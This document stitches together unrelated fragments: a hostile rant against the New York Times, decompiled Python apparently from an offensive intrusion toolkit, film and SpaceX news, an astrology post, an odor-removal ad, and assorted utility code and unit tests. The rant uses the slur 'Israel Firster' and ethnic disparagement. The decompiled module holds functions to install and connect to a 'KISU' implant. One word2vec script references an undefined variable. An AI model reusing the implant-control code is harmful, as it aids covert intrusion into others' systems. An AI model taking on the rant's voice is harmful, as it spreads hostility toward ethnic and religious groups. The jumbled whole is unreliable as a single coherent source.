As If that is not enough inciteful and hysterical hate mongering, this moron of a bigot goes on to state that Palestinians are letting their kids become ‘martyrs’ in exchange for cash from the Palestinian Authority. Maligning and defaming the fallen Palestinians and their mothers with this particular bit of slander has appeared once too often in Sulzberger’s publications. It cannot be written off as the work of a deranged solitary journalist.
No kind of apology will ever suffice for this kind of vindictive graffiti that pollutes many a page published by the New York Times Company. It is one thing for the Times to be a belligerent in the Palestinian/Israeli conflict and quite another to practice the arson of defamation. The Palestinians have no refuge from the Times, but Arab-Americans and the Muslims of America will long remember the vilification and manufactured disdain that have become a nauseating by-product of pro-Israeli advocacy at The New York Times. The arsenal buried in the archives of Mr Sulzberger’s publications inflicted many a wound to our collective memory.
Jacoby’s article completely ignored the almost 200 Palestinians who had been killed by the IDF at the time the article was published. Also unmentioned by Jacoby are the thousands of Palestinians who were maimed and mutilated by the unrestrained force being applied by the IDF. Nothing is said about the extent of property damage inflicted on Palestinians and the desecration of their mosques and churches. Jacoby’s racist drivel can always be found in the archives of the New York Times Publishing Company (Boston Globe Division).
What was even more outrageous about this particular ‘Boston Globe / New York Times’ Jacoby article was that it came in response to a full-page advertisement by the American-Arab-Anti-Discrimination Committee in the New York Times. Yet there is no mention in Jacoby’s article that his paycheck is written by the New York Times Publishing Company. Sulzberger and his company have no qualms about selling space to an Arab-American civil rights organization in one of his publications and turning around and allowing The Boston Globe’s Jacoby to slander every Palestinian victim, every Palestinian victim’s family, every Arab, every Arab-American and every Muslim-American. Sulzberger is not beyond selling an Ad to a baker and then spreading ruinous rumors about his dough.
All this is nothing new for Sulzberger and his minions in New York and Boston.
They have long considered it fair game to malign fellow Americans of Arab descent We are just considered a side casualty of the Israel Firster’s attempt to demonize the Palestinians. Well, let them write what they want. We just need them to remember to leave a copy in the archives.
It is said of lawyers that 99% of them give the other one- percent a bad name. I don’t know what the exact figures are for New York Times journalists. But the archives paint a pretty dismal picture. Every journalist at the Times and the Globe writes in the company of other journalists who get paid by Sulzberger. Jacoby, Sontag, Safire, Friedman and Bob Herbert toil at the same place as Anthony Lewis. Can it be that Lewis was blind to the suspect journalism of his colleagues? Does Jacoby’s attitude extend to those who do the hiring and firing at the New York Times?. How diverse is the staff at this print media empire, anyhow? Time for nothing but worries at the New York Times. Infested archives are the dry rot that will reduce Sulzberger’s print empire back to being just another ethnic provincial paper. The internet is not good news for the print media titans. |
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import demi.windows
import demi.registry
import dsz.env
import re
ConnectedEnv = '_DEMI_KISU_COMMS_ESTABLISHED'
KiSuEnabledEnv = '_DEMI_KISU_ENABLED'
def IsConnected():
id = ConnectedId()
return id != None
def ConnectedId():
curId = None
try:
curId = int(dsz.env.Get(ConnectedEnv), 16)
if curId == 0:
return
return curId
except:
return
return
def UseKiSu():
if not IsConnected():
return False
try:
state = dsz.env.Get(KiSuEnabledEnv)
if state.lower() in ('true', 'enabled', 'on', '1', 'go', 'use'):
return True
except:
pass
return False
def EnableKiSu():
dsz.env.Set(KiSuEnabledEnv, 'on')
return True
def DisableKiSu():
dsz.env.Set(KiSuEnabledEnv, 'off')
return True
def IsKisuAvailable(instance=None, type=None):
return dsz.cmd.Run('available -command kisu_install')
def InstallKiSu(instance=None, type=None):
dsz.ui.Echo('entered')
instanceId = '-type PC'
if instance != None:
instanceId = '-instance 0x%08x' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_install %s' % instanceId)
def ConnectKiSu(instance=None, type=None):
instanceId = '-type PC'
if instance != None:
instanceId = '-instance %s' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_connect %s' % instanceId)
def DisconnectKiSu():
return dsz.cmd.Run('kisu_disconnect')
def EnsureConnected(ask=True):
if demi.IsConnected():
return True
if not ask:
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.ERROR)
return False
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.WARNING)
try:
str = dsz.ui.GetString('What KISU would you like to connect to?', 'pc')
except:
return False
key = '-type'
try:
if re.match('^([0-9]+)|(0[xX][0-9a-fA-F]{1,8})$', str):
key = '-instance'
except:
pass
dsz.ui.Echo('Loading KISU tool')
if not dsz.cmd.Run('available -command kisu_connect -load'):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('* Unable to load KISU tool', dsz.ERROR)
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
dsz.ui.Echo('Attempting to connect to KISU %s' % str)
if not dsz.cmd.Run('kisu_connect %s %s' % (key, str)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('* Unable to connect to a KISU instance', dsz.ERROR)
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
def TranslateIdToName(id):
Unknown = 'Unknown'
if id == None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for name in demi.mcf.kisu.ids.nameTable:
if demi.mcf.kisu.ids.nameTable[name] == id:
return name
except:
pass
return Unknown
def TranslateNameToId(Name):
Unknown = 0
if Name == None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for kisuName in demi.mcf.kisu.ids.nameTable:
if kisuName.lower() == Name.lower():
return demi.mcf.kisu.ids.nameTable[kisuName]
except:
pass
return Unknown |
Writer and director William McGregor’s debut feature Gwen is to premier at the Toronto International Film Festival 2018, showing in the festival’s Discovery section. Eleanor Worthington-Cox, who plays the title role, has been picked as a TIFF 18 Rising Star.
Set in 19th century Wales gothic drama Gwen follows the story of a young girl trying to keep her family together, in the face of her mother’s mysterious illness, her father’s absence and a ruthless mining company encroaching on their land.
Gwen also stars Maxine Peake, Richard Harrington, Kobna-Holdbrook Smith, Mark Lewis Jones and newcomer Jodie Innes.
The feature was developed by the BFI and Endor Productions with Hilary Bevan Jones and Tom Nash as lead producers. The BFI’s Lizzie Francke, Paul Grindey and Charles Moore of Viewfinder Films, Fergus Haycock of Great Point Media and Adam Partridge of Ffilm Cymru Wales are executive producers. The production was co-financed by the BFI and Ffilm Cymru Wales. |
# Consider if this is the correct location for this element
def test_valid_coord(coord):
"""
Fill in
"""
assert type(coord) is tuple, "{} is not a tuple (coord)".format(coord)
assert type(coord[0]) is int, "{} is not an int (coord 0)".format(coord[0])
assert type(coord[1]) is int, "{} is not an int (coord 1)".format(coord[1])
assert coord[0] > -1, "{} must be greater than zero (coord 0)".format(coord[0])
assert coord[1] > -1, "{} must be greater than zero (coord 1)".format(coord[1])
return True
# This can probably be consolidated into an error class
def coord_range(coord0, coord1):
"""
Returns a list of coordinates for a table (by row) between two coordinate points of the form (0,0) where the first coordinate value is less than the second in both axes
@parameter - coord0, type = tuple
@parameter - coord1, type = tuple
@return, type = list of tuples or error
@dependencies, test_valid_coord (lf) which returns true or raises an assertion error
"""
# _Testing
if test_valid_coord(coord0) and test_valid_coord(coord1):
pass
else:
raise TypeError("Rewrite coordinates") # consider if type error is the best error for this
# _Main
ret_list = []
if coord0[0] <= coord1[0] and coord0[1] <= coord1[1]:
init0 = coord0[0]
init1 = coord0[1]
while init0 < coord1[0] + 1:
while init1 < coord1[1] + 1:
ret_list.append((init0,init1))
init1 += 1
init0 += 1
init1 = coord0[1]
else:
raise TypeError("Specify a valid start and end coordinate")
return ret_list
|
My sister often says to me: reach for the better feeling.
I am trying now to bring you a message of hope – that when things seem/feel most bleak, to keep reaching for the better feeling even if your practice does include the dark sunglasses of wallow and dirge.
And to eat nourishing food.
(Visit my latest Beliefnet post on the DEATH CARD for a Part One of sorts).
Mercury Mars in Taurus trine Pluto: YOU DO NOT QUIT.
Venus Jupiter sextile in happy signs, a blessing of abundance and good cheer.
I’ve heard of a few lucky breaks today — but what happens when… what happens when you are living the Death card but no Temperance, no Star in sight?
You are fierce, dressed in black, feathered, your eye knows the way. You are not alone. Not now, not here, not ever. Your very cry is an invocation. You very cry is the way there. Keep going.
The Stars Today: Mercury Enters Virgo! |
"""
Created on 16 Nov 2018
@author: Bruno Beloff ([email protected])
"""
from collections import OrderedDict
from scs_core.data.json import JSONable
# --------------------------------------------------------------------------------------------------------------------
class OPCStatus(JSONable):
"""
classdocs
"""
CHARS = 6
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct(cls, chars):
if len(chars) != cls.CHARS:
raise ValueError(chars)
fan_on = chars[0]
laser_dac_on = chars[1]
fan_dac_value = chars[2]
laser_dac_value = chars[3]
laser_switch = chars[4]
gain_toggle = chars[5]
return OPCStatus(fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle):
"""
Constructor
"""
self.__fan_on = int(fan_on)
self.__laser_dac_on = int(laser_dac_on)
self.__fan_dac_value = int(fan_dac_value)
self.__laser_dac_value = int(laser_dac_value)
self.__laser_switch = int(laser_switch)
self.__gain_toggle = int(gain_toggle)
# ----------------------------------------------------------------------------------------------------------------
def fan_is_on(self):
return self.fan_on & 0x01
def laser_is_on(self):
return self.laser_switch & 0x01
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['fan-on'] = self.fan_on
jdict['laser-dac-on'] = self.laser_dac_on
jdict['fan-dac-value'] = self.fan_dac_value
jdict['laser-dac-value'] = self.laser_dac_value
jdict['laser-switch'] = self.laser_switch
jdict['gain-toggle'] = self.gain_toggle
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def fan_on(self):
return self.__fan_on
@property
def laser_dac_on(self):
return self.__laser_dac_on
@property
def fan_dac_value(self):
return self.__fan_dac_value
@property
def laser_dac_value(self):
return self.__laser_dac_value
@property
def laser_switch(self):
return self.__laser_switch
@property
def gain_toggle(self):
return self.__gain_toggle
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "OPCStatus:{fan_on:0x%02x, laser_dac_on:0x%02x, fan_dac_value:0x%02x, laser_dac_value:0x%02x, " \
"laser_switch:0x%02x, gain_toggle:0x%02x}" % \
(self.fan_on, self.laser_dac_on, self.fan_dac_value, self.laser_dac_value,
self.laser_switch, self.gain_toggle)
|
BBC Midlands Today anchorman, also presenter & chat show host, Nick Owen, says he loves the Rex Cinema in Berkhamsted, Herts.
«The Rex Cinema in Berkhamsted, Herts., was the scene of my first kiss – Nick Owen reveals. – I was sitting in the back row watching the Elvis Presley film Kid Galahad with my first girlfriend Philippa. She was 5’5” and I was 5’3” but, even then, size didn’t matter!
I slowly plucked up courage to put my arm around her shoulder. Then, I went inexorably to that first, momentous and historic kiss. It was like being plugged into an electric socket! What a buzz that I’ll never forget».
The cinema itself was an interesting Art Deco building. So unusual was it that it’s been the subject of a long-running battle to save it. It has now been preserved as a cinema, amongst other things, and was recently described as ‘possibly the most beautiful cinema in the land’. For me as a youngster, it was just about the only place for entertainment in my small hometown, within walking-distance of home and, to this day, remains jam-packed with wonderful memories.
The Rex Cinema in Berkhamsted, Herts. |
# Copyright 2014-2015 Predikto, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
class RequestError(Exception):
def __init__(self, response, content=None, message=None):
self.response = response
self.content = content
self.message = message
def __str__(self):
message = "ERROR!"
if hasattr(self.response, 'status_code'):
message += " HTTP Status: %s." % (self.response.status_code)
if hasattr(self.response, 'message'):
message += " Message: %s." % (self.response.message)
if self.content is not None:
message += " Error: " + str(self.content)
return message
class MissingConfig(Exception):
pass
class ClientError(RequestError):
"""
Base
"""
pass
class InvalidResource(ClientError):
"""
400
"""
pass
class Unauthorized(ClientError):
"""
401
"""
pass
class Forbidden(ClientError):
"""
403
"""
pass
class ResourceNotFound(ClientError):
"""
404
"""
pass
class EntityTooLarge(ClientError):
"""
413
"""
pass
class ServerError(RequestError):
"""
500
"""
pass
class MethodNotAllowed(ClientError):
"""
405
"""
def allowed_methods(self):
return self.response['Allow']
|
One of Indonesia’s cultural heritage is an art craft that are scattered throughout the islands of Indonesia from Sabang to Merauke. There are more than 300 tribes that are diverse in local languages, customs, arts, traditional houses, and crafts products.
Indonesian craft forms influenced by elements of animism and dynamism. This old belief influenced the culture brought by traders from India, China, and Persia. And is also influenced by the arrival of the Europeans, when traveling to look for herbs that grow in Indonesia. These traders settled and brought their traditions and arts and culture. Culture is what acculturated with local cultures that have influenced the development of local art.
Various craft has now developed in Indonesia such as Woodworking, silver, batik, weaving, bamboo, metal, leather, wicker, rattan, pottery and ceramics, glass, painting, and traditional house. |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import signal
import time
import unittest
from datetime import datetime
import psutil
import six
from airflow import DAG
from airflow.utils import helpers
from airflow.models import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
class TestHelpers(unittest.TestCase):
@staticmethod
def _ignores_sigterm(child_pid, child_setup_done):
def signal_handler(signum, frame):
pass
signal.signal(signal.SIGTERM, signal_handler)
child_pid.value = os.getpid()
child_setup_done.release()
while True:
time.sleep(1)
@staticmethod
def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
def signal_handler(signum, frame):
pass
os.setsid()
signal.signal(signal.SIGTERM, signal_handler)
child_setup_done = multiprocessing.Semaphore(0)
child = multiprocessing.Process(target=TestHelpers._ignores_sigterm,
args=[child_pid, child_setup_done])
child.start()
child_setup_done.acquire(timeout=5.0)
parent_pid.value = os.getpid()
setup_done.release()
while True:
time.sleep(1)
def test_render_log_filename(self):
try_number = 1
dag_id = 'test_render_log_filename_dag'
task_id = 'test_render_log_filename_task'
execution_date = datetime(2016, 1, 1)
dag = DAG(dag_id, start_date=execution_date)
task = DummyOperator(task_id=task_id, dag=dag)
ti = TaskInstance(task=task, execution_date=execution_date)
filename_template = "{{ ti.dag_id }}/{{ ti.task_id }}/{{ ts }}/{{ try_number }}.log"
ts = ti.get_template_context()['ts']
expected_filename = "{dag_id}/{task_id}/{ts}/{try_number}.log".format(dag_id=dag_id,
task_id=task_id,
ts=ts,
try_number=try_number)
rendered_filename = helpers.render_log_filename(ti, try_number, filename_template)
self.assertEqual(rendered_filename, expected_filename)
def test_reap_process_group(self):
"""
Spin up a process that can't be killed by SIGTERM and make sure
it gets killed anyway.
"""
parent_setup_done = multiprocessing.Semaphore(0)
parent_pid = multiprocessing.Value('i', 0)
child_pid = multiprocessing.Value('i', 0)
args = [parent_pid, child_pid, parent_setup_done]
parent = multiprocessing.Process(target=TestHelpers._parent_of_ignores_sigterm,
args=args)
try:
parent.start()
self.assertTrue(parent_setup_done.acquire(timeout=5.0))
self.assertTrue(psutil.pid_exists(parent_pid.value))
self.assertTrue(psutil.pid_exists(child_pid.value))
helpers.reap_process_group(parent_pid.value, logging.getLogger(),
timeout=1)
self.assertFalse(psutil.pid_exists(parent_pid.value))
self.assertFalse(psutil.pid_exists(child_pid.value))
finally:
try:
os.kill(parent_pid.value, signal.SIGKILL) # terminate doesnt work here
os.kill(child_pid.value, signal.SIGKILL) # terminate doesnt work here
except OSError:
pass
def test_chunks(self):
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], 0)]
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], -3)]
self.assertEqual([i for i in helpers.chunks([], 5)], [])
self.assertEqual([i for i in helpers.chunks([1], 1)], [[1]])
self.assertEqual([i for i in helpers.chunks([1, 2, 3], 2)],
[[1, 2], [3]])
def test_reduce_in_chunks(self):
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[]),
[[1, 2, 3, 4, 5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[],
2),
[[1, 2], [3, 4], [5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + y[0] * y[1],
[1, 2, 3, 4],
0,
2),
14)
def test_is_in(self):
obj = ["list", "object"]
# Check for existence of a list object within a list
self.assertTrue(
helpers.is_in(obj, [obj])
)
# Check that an empty list returns false
self.assertFalse(
helpers.is_in(obj, [])
)
# Check to ensure it handles None types
self.assertFalse(
helpers.is_in(None, [obj])
)
# Check to ensure true will be returned of multiple objects exist
self.assertTrue(
helpers.is_in(obj, [obj, obj])
)
def test_is_container(self):
self.assertFalse(helpers.is_container("a string is not a container"))
self.assertTrue(helpers.is_container(["a", "list", "is", "a", "container"]))
def test_as_tuple(self):
self.assertEqual(
helpers.as_tuple("a string is not a container"),
("a string is not a container",)
)
self.assertEqual(
helpers.as_tuple(["a", "list", "is", "a", "container"]),
("a", "list", "is", "a", "container")
)
class HelpersTest(unittest.TestCase):
def test_as_tuple_iter(self):
test_list = ['test_str']
as_tup = helpers.as_tuple(test_list)
self.assertTupleEqual(tuple(test_list), as_tup)
def test_as_tuple_no_iter(self):
test_str = 'test_str'
as_tup = helpers.as_tuple(test_str)
self.assertTupleEqual((test_str,), as_tup)
def test_is_in(self):
from airflow.utils import helpers
# `is_in` expects an object, and a list as input
test_dict = {'test': 1}
test_list = ['test', 1, dict()]
small_i = 3
big_i = 2 ** 31
test_str = 'test_str'
test_tup = ('test', 'tuple')
test_container = [test_dict, test_list, small_i, big_i, test_str, test_tup]
# Test that integers are referenced as the same object
self.assertTrue(helpers.is_in(small_i, test_container))
self.assertTrue(helpers.is_in(3, test_container))
# python caches small integers, so i is 3 will be True,
# but `big_i is 2 ** 31` is False.
self.assertTrue(helpers.is_in(big_i, test_container))
self.assertFalse(helpers.is_in(2 ** 31, test_container))
self.assertTrue(helpers.is_in(test_dict, test_container))
self.assertFalse(helpers.is_in({'test': 1}, test_container))
self.assertTrue(helpers.is_in(test_list, test_container))
self.assertFalse(helpers.is_in(['test', 1, dict()], test_container))
self.assertTrue(helpers.is_in(test_str, test_container))
self.assertTrue(helpers.is_in('test_str', test_container))
bad_str = 'test_'
bad_str += 'str'
self.assertFalse(helpers.is_in(bad_str, test_container))
self.assertTrue(helpers.is_in(test_tup, test_container))
self.assertFalse(helpers.is_in(('test', 'tuple'), test_container))
bad_tup = ('test', 'tuple', 'hello')
self.assertFalse(helpers.is_in(bad_tup[:2], test_container))
def test_is_container(self):
self.assertTrue(helpers.is_container(['test_list']))
self.assertFalse(helpers.is_container('test_str_not_iterable'))
# Pass an object that is not iter nor a string.
self.assertFalse(helpers.is_container(10))
def test_cross_downstream(self):
"""Test if all dependencies between tasks are all set correctly."""
dag = DAG(dag_id="test_dag", start_date=datetime.now())
start_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(1, 4)]
end_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(4, 7)]
helpers.cross_downstream(from_tasks=start_tasks, to_tasks=end_tasks)
for start_task in start_tasks:
six.assertCountEqual(self, start_task.get_direct_relatives(upstream=False), end_tasks)
if __name__ == '__main__':
unittest.main()
|
Refer a friend to Rhett Women’s Center Aesthetics and receive a $25 gift certificate towards a service of your choosing.
Sign up for our Brilliant Distinctions rewards program to save up to $200 off Coolsculpting treatments.
Now offering Dual Coolsculpting. Get the same non-invasive, fat freezing results in half the time. Treat stubborn fat, simultaneously giving you faster more flexible Coolsculpting treatments. |
### Taken from https://pypi.python.org/pypi/paho-mqtt
### Requires Paho-MQTT package, install by:
### pip install paho-mqtt
import paho.mqtt.client as mqtt
MQTT_URL = ""
MQTT_USERID = ""
MQTT_PASSWD = ""
MQTT_TOPIC_EVENT = ''
MQTT_TOPIC_PUB = ''
MQTT_PUB_STRING = ''
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
if MQTT_TOPIC_EVENT:
client.subscribe(MQTT_TOPIC_EVENT)
print("Subscribed to " + MQTT_TOPIC_EVENT)
if MQTT_PUB_STRING:
client.publish(MQTT_TOPIC_PUB, MQTT_PUB_STRING, 0)
print("Published " + MQTT_PUB_STRING + " to " + MQTT_TOPIC_PUB)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
print("connecting to " + MQTT_URL)
client.username_pw_set(MQTT_USERID, MQTT_PASSWD)
client.connect(MQTT_URL, 1883, 60)
client.loop_forever()
|
Bright and sunny weather is expected Throughout the day it will be dry. It's getting warmer - the temperature rises from 16 degrees on Sunday to 22 degrees on Tuesday. On Sunday a fresh wind from the northwest. |
# -*- coding: utf-8 -*-
"""
时间处理模块,统一处理时间相关函数
@author: AZLisme
@email: [email protected]
"""
from datetime import datetime, timedelta
import pytz
import time
_DEFAULT_TIMEZONE = pytz.utc
def now(tz=None):
"""获取现在的日期对象(带时区)"""
if tz is None:
return datetime.now(tz=_DEFAULT_TIMEZONE)
else:
return datetime.now(tz=tz)
def get_timezone(tz_name: str):
"""获取时区对象,封装pytz
:param tz_name: 时区名字,常用的有'UTC', 'Asia/Shanghai'
:return:
"""
return pytz.timezone(tz_name)
def get_default_timezone():
"""获取默认时间戳
:return:
"""
return _DEFAULT_TIMEZONE
def set_default_timezone(tz_name: str) -> None:
"""设置默认的时区
:param Union(str, unicode) tz_name: 时区名字, 例如 'UTC', 'Asia/Shanghai'
:return: None
"""
global _DEFAULT_TIMEZONE
_DEFAULT_TIMEZONE = pytz.timezone(tz_name)
def timestamp(dt: datetime = None) -> float:
"""获取时间戳, 如果参数为None则返回当前时间戳
:param dt: 要转化为时间戳的时间,如果为None则返回当前时间戳。
:return float: 时间戳
"""
if dt is None:
return time.time()
else:
if dt.tzinfo is None:
dt = _DEFAULT_TIMEZONE.localize(dt)
utc_dt = dt.astimezone(pytz.utc)
delta = utc_dt - datetime(1970, 1, 1, 0, 0 ,0, 0, pytz.utc)
return delta.total_seconds()
def datetime_from_timestamp(ts: float) -> datetime:
""" 从时间戳获取日期对象
:param ts: 时间戳
:return: 日期对象
"""
dt = datetime(1970, 1, 1, 0, 0 ,0, 0, pytz.utc) + timedelta(seconds=ts)
return dt.astimezone(_DEFAULT_TIMEZONE)
|
All are welcome! Come to socialize or learn how to shoot! We have bows and arrows available for use on the day. Please note that minors must be accompanied by a parent or guardian at all times. If you don’t feel like doing archery, then bring a chair and sit under the shade to watch the archers, have a chat and work on your current A&S projects. Clubrooms are also available. |
# -*- coding: utf-8 -*-
import gensim
import jieba
import pandas as pd
from tqdm import tqdm
from datetime import datetime
class yjiang(object):
def __init__(self):
self.idx2id = None
self.raw_sentence = None
self.preprocess_sentence = None
self.vecs = None
self.alternative_words = set()
def load_raw(self, file_path):
data = pd.read_csv(file_path)
self.idx2id = data["productid"].to_dict()
self.raw_sentence = data[u"commentcontent"].map(str).tolist()
def preprocess(self):
cut_sentence = [list(jieba.cut(s)) for s in tqdm(self.raw_sentence)]
self.preprocess_sentence = cut_sentence # 可能这里还需要去掉停用词
def train_wordvec(self, param="default"):
if param == "default":
param = {
"size": 100, # Word vector dimensionality
"min_count": 5, # Minimum word count
"workers": 4, # Number of threads to run in parallel
"window": 10, # Context window size
"sample": 1e-3 # Downsample setting for frequent words
}
print "\n{} Training wordvector ...".format(datetime.now())
model = gensim.models.Word2Vec(self.preprocess_sentence, seed=1, **param)
model.init_sims(replace=True)
print "\n{} Saving wordvector ...".format(datetime.now())
model.save("{}features_{}mincount_{}windowsize".format(param["size"], param["min_count"], param["window"]))
def load_wordvec(self, filename, test=False):
self.vecs = gensim.models.Word2Vec.load(filename)
if test:
print self.vecs.most_similar(u"不错")
print "Successfully!"
def find_alternative_words(self, threshold=0.9, k=5):
print "{} Finding alternative words ...".format(datetime.now())
for w in tqdm(self.vecs.vocab):
t = self.vecs.similar_by_vector(w, N)
i = 0
while i < k:
if t[i][1] >= threshold:
self.alternative_words.add((w, t[i][0]) if w > t[i][0] else (t[i][0], w))
else:
break
i += 1
def run(self, file_path):
self.load_raw(file_path)
self.preprocess()
self.train_wordvec()
self.load_wordvec('100features_5mincount_10windowsize')
self.find_alternative_words()
print "\n", self.alternative_words.__len__()
if __name__ == "__main__":
tt = yjiang()
tt.run("text.csv")
|
Real Estate Agents. Are You Looking for Permanent Answers to Removal of Smoke and Other Difficult Odors In Properties That Have Listed or Want to List?
When your Clients need these important services, why not offer them one that can Guarantee 100% removal with no chemical residue or harm to structure?
That’s where Just Gone Sanitizing & Deodorizing System™ comes in and makes you look like the proverbial Super Hero! Where others spend hours and even days trying to rid homes of their horrible odors that keep them from selling for top dollar, we can come in and in no time permanently remove the most retractable smells, even dead body odors!
Whether the odor is airborne or has penetrated textiles, floor coverings, and even wall coverings and paint, our Just Gone Sanitizing & Deodorizing System™ can get all of them out…Permanently!
Just a few of the odors that with Just Gone Sanitizing ™ System are well…just gone!
With Just Gone Sanitizing & Deodorizing System™ there is literally nothing that you cannot tackle and come out successful, all the while making your clients happy not to speak of the all-important buyers. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of truck
# <truck - test-friendly event bus layer on top of django signals>
# Copyright (C) <2012> Gabriel Falcão <[email protected]>
# Copyright (C) <2012> Yipit Inc. <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, call
from truck.core import Loader
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_be_able_to_load_a_single_module(imp, importlib):
u"Loader should be able to load a listener from a module"
importlib.import_module.return_value.__path__ = '/some/path'
Loader.import_listener_from_module('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
importlib.import_module.assert_has_calls([
call('deal'),
call('deal.listeners'),
])
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_is_no_such_app(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.side_effect = (
AttributeError('there is no such module'))
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
assert not imp.find_module.called
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_are_no_listeners(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.return_value.__path__ = '/some/path'
imp.find_module.side_effect = ImportError('LOL')
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
@patch.object(Loader, 'import_listener_from_module')
@patch('truck.core.settings')
def test_loader_start_maps_installed_apps(
settings, import_listener_from_module):
"Loader.start() should ignore when the app does not exist"
settings.INSTALLED_APPS = ['chuck', 'norris']
Loader.start()
import_listener_from_module.assert_has_calls([
call('chuck'),
call('norris'),
])
|
SpaceX's Falcon 9 rocket and the DSCOVR space-weather satellite on the launch pad at Florida's Cape Canaveral Air Force Station. Launch is scheduled for the evening of Feb. 11, 2015.
SpaceX has scaled back the daring rocket-landing test that it plans to perform after it launches a space weather satellite today (Feb. 11).
The private spaceflight company had intended to try landing the first stage of its Falcon 9 rocket on an "autonomous spaceport drone ship" in the Atlantic Ocean during today's liftoff of the Deep Space Climate Observatory (DSCOVR), which is scheduled to take place at 6:03 p.m. EST (2303 GMT) from Florida's Cape Canaveral Air Force Station. You can watch the SpaceX launch live online, courtesy of NASA TV, beginning at 5 p.m. EST (2200 GMT).
But rough seas have scuttled that plan.
"The drone ship was designed to operate in all but the most extreme weather. We are experiencing just such weather in the Atlantic, with waves reaching up to three stories in height crashing over the decks," SpaceX representatives wrote in an update today. The drone ship, called "Just Read the Instructions," is named after a fictional sentient colony ship from the science fiction novels of author Iain M. Banks.
"Also, only three of the drone ship's four engines are functioning, making station-keeping in the face of such wave action extremely difficult," SpaceX representatives wrote in the statement. "The rocket will still attempt a soft landing in the water through the storm (producing valuable landing data), but survival is highly unlikely."
"Because DSCOVR is traveling to deep space, the moon's location on Feb. 12 through 19 would be close enough to DSCOVR to affect the spacecraft's trajectory," NASA officials wrote in a blog post today. "This would require performing mid-course correction burns that would use more fuel than what is planned for the mission. After today, the next launch opportunity would be on Friday, Feb. 20, at 5:43:44 p.m. EST."
Weather forecasts predict a 90 percent chance of good conditions at the launch pad today, and more manageable high-altitude winds, they added.
The $340 million DSCOVR mission, a joint project of the National Oceanic and Atmospheric Administration, NASA and the U.S. Air Force, is headed for the Earth-sun Lagrange Point 1, a gravitationally stable spot in space about 930,000 miles (1.5 million kilometers) from Earth. The spacecraft is designed to watch for strong solar storms that could affect power grids and satellite operations here on Earth.
The DSCOVR project began in 1998 as Triana, an Earth-observing mission championed by then-Vice President Al Gore. It was mothballed in 2001, then resurrected as a space-weather effort in 2009.
